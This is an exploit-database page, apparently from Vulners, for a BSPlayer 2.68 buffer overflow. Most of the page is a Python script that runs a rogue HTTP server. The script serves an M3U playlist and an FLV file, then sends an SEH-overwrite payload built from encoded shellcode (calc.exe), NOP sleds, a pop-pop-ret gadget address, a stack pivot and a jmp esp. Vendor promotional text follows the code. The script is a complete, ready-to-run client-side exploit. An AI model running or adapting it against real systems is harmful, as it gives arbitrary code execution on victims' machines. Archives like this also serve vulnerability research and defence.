Lucene search
K

Bsplayer-2.68-Buffer-Overflow

🗓️ 22 Jan 2015 15:33:03Reported by Fady Mohammed OsmanType 
exploitpack
 exploitpack
👁 21 Views

Buffer overflow exploit sending malicious payloads using different media file types

Code
import socket
import sys
s = socket.socket()         # Create a socket object
if(len(sys.argv) < 3):
  print "[x] Please enter an IP and port to listen to."
  print "[x] " + "./" + sys.argv[0] + " ip port"
  exit()
host = sys.argv[1]	    # Ip to listen to.
port = int(sys.argv[2])     # Reserve a port for your service.
s.bind((host, port))        # Bind to the port
print "[*] Listening on port " + str(port)
s.listen(5)                 # Now wait for client connection.
c, addr = s.accept()        # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending M3U File to ', addr))
c.recv(1024)
response = "HTTP/1.1 200 OK\r\n"
response += "Date: Fri, 09 Jan 2015 20:44:48 GMT\r\n"
response += "Server: Apache/2.4.10 (Ubuntu)\r\n"
response += "Last-Modified: Fri, 09 Jan 2015 20:44:25 GMT\r\n"
response += "ETag: \"3e-50c3e38dd7191\"\r\n"
response += "Accept-Ranges: bytes\r\n"
response += "Content-Length: 68\r\n"
response += "Connection: close\r\n"
response += "Content-Type: audio/x-mpegurl\r\n\r\n"
response += "#EXTM3U\x0a"
response += "http://" + host + ":" + str(port) +  "/boom.flv\x0a"
response += "http://" + host + ":" + str(port) +  "/\x0a\r\n\r\n"
c.send(response)
c.close()

c, addr = s.accept()     # Establish connection with client.
# Sending media file to force the loading of MSVCR71.dll file so we can use it later.
print(('[*] Sending FLV File to ', addr))
c.recv(1024)
content = ""
with open('1.flv', 'r') as content_file:
	content = content_file.read()
response = "HTTP/1.1 200 OK\r\n"
response += "Date: Fri, 09 Jan 2015 20:44:48 GMT\r\n"
response += "Server: Apache/2.4.10 (Ubuntu)\r\n"
response += "Last-Modified: Fri, 09 Jan 2015 20:44:25 GMT\r\n"
response += "ETag: \"3e-50c3e38dd7191\"\r\n"
response += "Accept-Ranges: bytes\r\n"
response += "Content-Length: " + str(len(content)) + "\r\n"
response += "Connection: close\r\n"
response += "Content-Type: video/x-flv\r\n\r\n"
c.send(response + content +"\r\n\r\n")
c.close()
# Sending the payload.
c, addr = s.accept()     # Establish connection with client.
print(('[*] Sending Payload to ', addr))
c.recv(1024)
# calc.exe nothing fancy. used metasploit with shikata with one round (two and three rounds produced bad chars be carefull if you're gonna change this).
# Bad chars are \x0a\x0d\x00
buf =  ""
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += "\x8c\xcd\x11\xc2\x37\x12"

buf = buf + "\x90" * 2048

nopsize = 8236 - len(buf)
nops = "\x90" * nopsize
#Jump the 6 bytes.
nseh =  "\xeb\x06\x90\x90"
# 0x7c373b7f : pop edi # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] : Thanks mona.py :)
seh = "\x7f\x3b\x37\x7c"
# Adding (subtracting with negative number to avoid null) stack pivot so esp will point to the beginning of the buffer. 
addesp = "\x81\xec\xf4\xfb\xff\xff"
# jumpping to esp.
jmpesp = "\xff\xe4"
# Zero all the registers for no obvious reasons but being paranoid :)
zeroall = "\x31\xc0" + "\x31\xdb" + "\x31\xc9" + "\x31\xd2" + "\x31\xf6" + "\x31\xff"
# More garbage data to make sure we trigger the exception handler rotine.
garbage = "\x41" * 8000
c.send(nops + buf + nseh + seh + addesp + zeroall + jmpesp + garbage + "\x00")
c.close()
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jan 2015 15:33Current
0.1Low risk
Vulners AI Score0.1
21